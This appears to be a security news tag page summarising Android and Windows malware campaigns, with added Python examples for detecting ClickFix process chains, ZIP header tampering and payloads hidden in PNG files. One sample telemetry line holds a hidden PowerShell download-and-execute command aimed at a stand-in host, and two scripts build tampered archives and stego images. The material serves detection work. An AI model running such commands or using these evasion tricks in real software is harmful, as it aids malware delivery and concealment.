obfuscation techniques

Tech Optimizer
December 3, 2025
The Wacatac Trojan is a family of malware first documented in January 2020 that disguises itself as benign software to trick users into installing it. It is detected under several names, including Trojan:Script/Wacatac and Trojan:Win32/Wacatac (the Script/ and Win32/ prefixes describe the file type the detection applies to, not separate families), and it connects to command-and-control (C2) servers for remote control. Reported capabilities include stealing credentials, evading antivirus detection, creating or joining botnets, damaging the system, acting as spyware or a remote access tool (RAT), and downloading additional malware. Symptoms of infection include sluggish performance, programs that fail to start, unexplained loss of storage space, and unfamiliar running processes. Wacatac spreads through unofficial software downloads, malicious web pages, and phishing emails. Removal is best handled with reputable antivirus software; prevention comes down to avoiding questionable downloads, practising good digital hygiene, keeping software updated, backing up data, and running a quality antivirus product. False positives do occur: the Wacatac verdict is largely heuristic, so legitimate programs (often unsigned installers or scripts) are sometimes flagged under this name, and a detection is worth confirming with a second scanner or the file's hash before the file is deleted.
Winsage
November 25, 2025
Cybersecurity researchers have identified a campaign that combines ClickFix tactics with counterfeit adult websites to trick users into running harmful commands under the guise of a "critical" Windows security update. The fake sites, some of them clones of well-known platforms, serve as the phishing lure and add psychological pressure on the victim. According to the Microsoft data the researchers cite, ClickFix-style attacks have risen sharply and account for 47% of the attacks observed. The chain begins when a user is redirected to the fake site and shown an "urgent security update": a full-screen imitation of the Windows Update screen, built in HTML and JavaScript, that tries to stop the user from dismissing it and instructs them to paste and run a command. That command launches MSHTA with a remote URL; the MSHTA payload retrieves a PowerShell script from the attacker's server, which in turn delivers several payloads, including various types of malware. The PowerShell script is obfuscated and attempts to elevate privileges, which can let the attackers deploy remote access trojans (RATs) that call back to command-and-control servers. The campaign has been linked to other malware execution chains that use the same ClickFix lure. The researchers recommend employee training and disabling the Windows Run box. A caveat on the second control: the Run box is only one paste target, and the same one-liner runs from a PowerShell or Terminal window or the File Explorer address bar, so monitoring process creation for mshta.exe launched with a URL and for PowerShell spawned by a script host is the more durable defence, and mshta.exe itself can be blocked with application control where there is no business need for it.
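To make the detection side concrete, here is an added example (not code from the article or from the researchers it cites) in Python that classifies process-creation records against the two-stage chain described above: mshta.exe launched from the shell with a remote URL, then PowerShell spawned by mshta.exe with hidden, encoded or download-cradle arguments. The event shape, rule names, regexes and domain are assumptions, and the sample telemetry is constructed for the example, not captured from a real host.

```python
import re
from dataclasses import dataclass


# Minimal process-creation record, the shape Sysmon event 1 or EDR telemetry provides.
@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Argument patterns typical of pasted ClickFix one-liners: encoded or hidden
# execution, in-memory evaluation, and download cradles (assumed indicator set).
SUSPICIOUS_PS_ARGS = re.compile(
    r"(?:^|\s)-e(?:nc|ncodedcommand)?\s"
    r"|-w(?:indowstyle)?\s+hidden"
    r"|\biex\b|invoke-expression|downloadstring|frombase64string",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: ProcessEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits = []
    image, parent = _basename(event.image), _basename(event.parent_image)
    if image == "mshta.exe" and REMOTE_URL.search(event.command_line):
        hits.append("mshta_remote_hta")           # mshta fetching an HTA over HTTP(S)
    if image == "mshta.exe" and parent == "explorer.exe":
        hits.append("mshta_from_shell")           # launched from the Run box / Explorer
    if image in POWERSHELL:
        if parent in SCRIPT_HOSTS:
            hits.append("powershell_child_of_script_host")
        if SUSPICIOUS_PS_ARGS.search(event.command_line):
            hits.append("powershell_suspicious_args")
    return hits


def scan(events):
    """Pair each event with its rule hits, keeping only events that matched something."""
    return [(e, hits) for e in events if (hits := classify(e))]


# Constructed sample telemetry (not real data): the two-stage chain plus two benign launches.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://update-check.example/verify"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -nop -c \"iex (New-Object Net.WebClient)"
                 ".DownloadString('https://update-check.example/s1')\""),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -NoProfile -File C:\Scripts\nightly-backup.ps1"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
]

if __name__ == "__main__":
    for event, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):50s} {event.command_line}")
```

The first two sample events trip both of their respective rules; the scheduled backup script and the vendor installer's local HTA match nothing, which is the point of keying on the parent process and on a remote URL rather than on mshta.exe or PowerShell alone.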
AppWizard
October 30, 2025
Cybersecurity researchers at zLabs have identified over 760 malicious Android applications that abuse Near Field Communication (NFC) and Host Card Emulation (HCE) to steal payment data and carry out fraudulent transactions. Since April 2024 these apps have grown into a coordinated global operation targeting financial institutions in Russia, Poland, the Czech Republic, Slovakia, and Brazil. The operators run around 70 command-and-control servers and use Telegram bots for data exfiltration. The apps impersonate about 20 legitimate entities, mainly Russian banks along with international brands such as Santander and Google Pay, and use several approaches to capture payment credentials, including "scanner" and "tapper" tools and simplified interfaces that resemble legitimate banking portals. Because HCE lets an app answer a payment terminal's NFC commands itself, the malware registers an HCE service that activates during a payment event and relays the card data in real time. To evade detection the operators rely on name masquerading, code obfuscation, and software packing. The campaign marks a significant escalation in NFC-based financial fraud and shows why granting an app NFC payment privileges deserves scrutiny.
AppWizard
October 15, 2025
The GhostBat RAT campaign delivers malicious Android droppers through WhatsApp, SMS with shortened URLs, GitHub-hosted APKs, and compromised websites. The droppers use multi-stage workflows, ZIP header manipulation, and string obfuscation to evade detection, which is why VirusTotal detections for the malware remain low. The malware bundles a banking-credential stealer and a cryptocurrency miner and directs victims to phishing pages that imitate the mParivahan app. SMS messages containing banking keywords are exfiltrated to command-and-control servers, and incoming messages can be forwarded for OTP harvesting; infected devices register through a Telegram bot named GhostBatRat_bot. The lineage goes back to July 2024, when Android malware impersonating Regional Transport Office applications was documented stealing contacts and SMS messages. Observations from September 2025 found more than forty samples spreading through WhatsApp and SMS, all ultimately delivering a malicious version of mParivahan that requests SMS permissions and presents a phishing interface. Architecturally, the first-stage dropper checks the device architecture and manufacturer; later stages decrypt and execute the payloads, a cryptominer library and the data-theft APK, behind native binary packing and heavy string obfuscation. Victims see a counterfeit Google Play update page that leads to installation of the malicious APK, which then requests SMS permissions and prompts the user to enter their UPI PIN into a fake payment flow; the PIN is forwarded to a Firebase endpoint.
The campaign highlights the need for careful SMS permission management and vigilance against shortened URLs to combat emerging Android malware threats.
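The summary names ZIP header manipulation without saying what is manipulated. As an added example (not code from the GhostBat analysis), the Python below builds a small APK-like ZIP, patches one member's local file header while leaving the central directory intact, and then scans for the disagreements this creates. The assumption behind the scanner is that such manipulation works by making the per-member local headers and the central directory disagree, since the installer trusts the central directory while many analysis tools read the local headers; the particular fields patched here (the encryption flag and the compression method) are illustrative choices, and the member names and contents are constructed.

```python
import io
import struct
import zipfile

LOCAL_SIG, CD_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
LOCAL_FMT = "<4sHHHHHIIIHH"        # 30-byte local file header
CD_FMT = "<4sHHHHHHIIIHHHHHII"     # 46-byte central directory entry
EOCD_FMT = "<4sHHHHIIH"            # 22-byte end-of-central-directory record
KNOWN_METHODS = {0, 8}             # stored and deflated: all an APK legitimately uses


def iter_central_directory(data: bytes):
    """Yield one dict per central directory entry (the view the installer trusts)."""
    eocd_at = data.rfind(EOCD_SIG)
    if eocd_at < 0:
        raise ValueError("no end-of-central-directory record")
    _, _, _, _, total, _, cd_off, _ = struct.unpack_from(EOCD_FMT, data, eocd_at)
    pos = cd_off
    for _ in range(total):
        f = struct.unpack_from(CD_FMT, data, pos)
        if f[0] != CD_SIG:
            raise ValueError(f"bad central directory signature at {pos:#x}")
        name_len, extra_len, comment_len = f[10], f[11], f[12]
        yield {
            "name": data[pos + 46:pos + 46 + name_len].decode("utf-8", "replace"),
            "flags": f[3], "method": f[4], "crc": f[7], "csize": f[8], "usize": f[9],
            "local_off": f[16],
        }
        pos += 46 + name_len + extra_len + comment_len


def find_header_anomalies(data: bytes) -> list[str]:
    """Compare each local file header against its central directory entry."""
    findings = []
    for e in iter_central_directory(data):
        off = e["local_off"]
        lf = struct.unpack_from(LOCAL_FMT, data, off)
        if lf[0] != LOCAL_SIG:
            findings.append(f"{e['name']}: bad local header signature at {off:#x}")
            continue
        l_flags, l_method, l_crc, l_csize, l_usize = lf[2], lf[3], lf[6], lf[7], lf[8]
        if l_method != e["method"]:
            findings.append(f"{e['name']}: method mismatch (local={l_method}, central={e['method']})")
        if {l_method, e["method"]} - KNOWN_METHODS:
            findings.append(f"{e['name']}: unknown compression method")
        if (l_flags | e["flags"]) & 0x0001:
            findings.append(f"{e['name']}: encryption flag set")
        # Bit 3 moves CRC and sizes into a trailing data descriptor, so compare only when it is clear.
        if not l_flags & 0x0008 and (l_crc, l_csize, l_usize) != (e["crc"], e["csize"], e["usize"]):
            findings.append(f"{e['name']}: CRC/size mismatch between local and central headers")
    return findings


def build_sample_apk() -> bytes:
    """Constructed stand-in for an APK: a small ZIP with the usual member names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<manifest package='example.test'/>" * 4)
        z.writestr("classes.dex", b"dex\n035\x00" + bytes(64))
        z.writestr("assets/stage2.bin", bytes(range(256)))
    return buf.getvalue()


def tamper_local_header(data: bytes, name: str, flags=None, method=None) -> bytes:
    """Patch only the local header of `name`; the central directory stays untouched."""
    buf = bytearray(data)
    for e in iter_central_directory(data):
        if e["name"] == name:
            if flags is not None:
                struct.pack_into("<H", buf, e["local_off"] + 6, flags)    # general-purpose flags
            if method is not None:
                struct.pack_into("<H", buf, e["local_off"] + 8, method)   # compression method
            return bytes(buf)
    raise KeyError(name)


if __name__ == "__main__":
    clean = build_sample_apk()
    print("clean:", find_header_anomalies(clean) or "no anomalies")
    evil = tamper_local_header(clean, "classes.dex", flags=0x0001, method=99)
    for finding in find_header_anomalies(evil):
        print("tampered:", finding)
```

On the clean archive the scanner is silent; on the tampered one it reports the method mismatch, the unknown method and the encryption flag for classes.dex. A real triage script would add the same comparison for the file name and the extra-field length, and would treat any entry whose local header lies outside the file as an immediate red flag.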
AppWizard
October 10, 2025
A spyware campaign is disguising itself as popular applications like TikTok, YouTube, and WhatsApp to lure users into downloading the ClayRat spyware. This campaign uses Telegram channels for distribution and employs fake download counts and testimonials on malicious websites. Discovered by Zimperium, the spyware requires users to set it as their default SMS application, allowing it to access sensitive information and spread further. The campaign is primarily targeting Russian users, with at least 600 samples and 50 droppers detected in the last 90 days. The malware uses obfuscation techniques to evade detection. Android users with Google Play Protect have some protection, but best practices for online safety are recommended, such as using reputable app sources and avoiding suspicious links.
AppWizard
October 9, 2025
A sophisticated Android spyware campaign called ClayRat is targeting users in Russia through Telegram channels and deceptive phishing websites that mimic popular applications like WhatsApp and TikTok. Once activated, ClayRat can exfiltrate sensitive data such as SMS messages and call logs, access device information, take photos, and send messages or make calls from the victim's device. It propagates by sending malicious links to all contacts in the victim's phone book. Over the past 90 days, Zimperium has identified over 600 samples and 50 droppers of ClayRat, which uses advanced obfuscation techniques to evade detection. The malware redirects users to fraudulent websites leading to Telegram channels, where they are lured into downloading APK files. Some samples function as droppers, displaying counterfeit Play Store update screens while concealing the actual payload. Once installed, ClayRat communicates with its command-and-control infrastructure and can capture sensitive content, making infected devices automated distribution nodes. Additionally, a study by researchers from the University of Luxembourg and Université Cheikh Anta Diop found that pre-installed applications on budget Android smartphones sold in Africa operate with elevated privileges, with 9% disclosing sensitive data and 16% exposing critical components without safeguards.
Tech Optimizer
October 8, 2025
An Android remote access trojan (RAT) published on GitHub under the name "Android-RAT" by the user Huckel789 has been analysed. Its author markets it as fully undetectable (FUD) and able to bypass modern security products; those are the seller's claims rather than verified properties. The tool is operated through a web-based interface and needs no installation on a PC, which lowers the skill required to use it. Hosting on GitHub lends it the platform's reputation and can help it slip past reputation-based filters. Advertised features include keylogging, credential hijacking, ransomware functionality, and social engineering tools. It is said to evade antivirus products and VirusTotal scans and to detect emulators and virtual machines. It persists through battery optimisation and power-management restrictions, particularly on Chinese ROMs such as MIUI, while consuming minimal system resources. C2 traffic is encrypted with AES-128-CBC, which complicates network inspection, and a "Freeze Mode" caps transmission at 1-3 MB per 24 hours to stay below volume-based anomaly thresholds. A dropper module can inject the payload into legitimate applications, which makes the initial infection vector hard to identify. One caveat on the encryption: with a symmetric cipher the key has to ship inside the client, so an analyst with the APK can recover it and decrypt the protocol; the encryption hinders passive network monitoring, not reverse engineering.
AppWizard
September 17, 2025
A mobile ad fraud operation called "SlopAds" infiltrated the Google Play Store with 224 malicious applications that together reached more than 38 million downloads across 228 countries. The operation used steganography and obfuscation to deliver its fraud payload while avoiding detection, and it activated the fraud system selectively, based on specific advertising campaigns, generating around 2.3 billion fraudulent bid requests a day, chiefly from the United States (30%), India (10%), and Brazil (7%). The apps used Firebase Remote Config to fetch encrypted data that led to the download of the primary fraud module, "FatModule", which was hidden inside PNG image files so that scanners treating images as inert data would not see it. FatModule also carried anti-analysis features aimed at security researchers. Google has removed all identified SlopAds applications from the Play Store and added protections through Google Play Protect.
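The page says FatModule was concealed inside PNG files but not how. As an added example (not code from the SlopAds research or from Google), the Python below builds a tiny valid PNG, stashes a blob in the two places a renderer ignores, a private ancillary chunk and bytes appended after IEND, and then walks the chunk list the way a triage script would, reporting non-standard chunks, CRC mismatches, trailing data and the byte entropy of anything suspicious. Which stash SlopAds actually used is not stated on the page; both locations here are assumptions, and the image and payload are constructed.

```python
import math
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP", b"sBIT",
    b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs", b"sPLT", b"tIME", b"eXIf",
}


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: big-endian length, type, data, CRC over type+data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; compressed or encrypted blobs sit near 8.0."""
    if not data:
        return 0.0
    counts = Counter(data)
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts.values())


def scan_png(data: bytes) -> list[str]:
    """Walk the chunk list and report anything a plain image would not carry."""
    if data[:8] != PNG_SIG:
        return ["not a PNG file"]
    findings, pos = [], 8
    while pos + 12 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        if pos + 12 + length > len(data):
            findings.append(f"{ctype!r}: truncated chunk")
            return findings
        body = data[pos + 8:pos + 8 + length]
        crc, = struct.unpack_from(">I", data, pos + 8 + length)
        if zlib.crc32(ctype + body) != crc:
            findings.append(f"{ctype!r}: CRC mismatch")
        if ctype not in STANDARD_CHUNKS:
            findings.append(f"{ctype!r}: non-standard chunk, {length} bytes, entropy {entropy(body):.2f}")
        pos += 12 + length
        if ctype == b"IEND":
            break
    trailing = data[pos:]
    if trailing:
        findings.append(f"{len(trailing)} bytes after IEND, entropy {entropy(trailing):.2f}")
    return findings


def build_sample_png(width: int = 4, height: int = 4) -> bytes:
    """Constructed 8-bit RGB image, a stand-in for an app's packaged artwork."""
    row = b"\x00" + bytes([200, 30, 30] * width)          # filter type 0 + solid red pixels
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(row * height)) + _chunk(b"IEND", b"")


def hide_payload(png: bytes, payload: bytes) -> bytes:
    """Split a blob between a private ancillary chunk ('stEg', assumed name) and the
    space after IEND. Decoders render the image unchanged either way."""
    iend = _chunk(b"IEND", b"")
    if not png.endswith(iend):
        raise ValueError("expected a PNG ending in an empty IEND chunk")
    half = len(payload) // 2
    return png[:-len(iend)] + _chunk(b"stEg", payload[:half]) + iend + payload[half:]


if __name__ == "__main__":
    clean = build_sample_png()
    payload = bytes(range(256)) * 2        # stands in for an encrypted module
    for label, img in (("clean", clean), ("stego", hide_payload(clean, payload))):
        print(label, scan_png(img) or "no findings")
```

A high-entropy non-standard chunk or tail is not proof of malice on its own (some editors write private chunks), but an asset that carries one and is later read back by the app's own code with a decryption routine is exactly the pattern described above and worth pulling apart.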
AppWizard
September 17, 2025
224 malicious applications have been removed from the Google Play Store due to a significant ad fraud operation named "SlopAds," which amassed over 38 million downloads. The campaign spanned 228 countries, with the highest ad impressions from the United States (30%), India (10%), and Brazil (7%). The apps used sophisticated obfuscation techniques to evade Google’s security measures. Users are advised to uninstall these harmful applications, as they can negatively impact device performance by causing excessive data consumption and battery strain. Users who sideload apps from unofficial sources are particularly vulnerable to such threats. Security experts anticipate that similar ad fraud operations may occur in the future.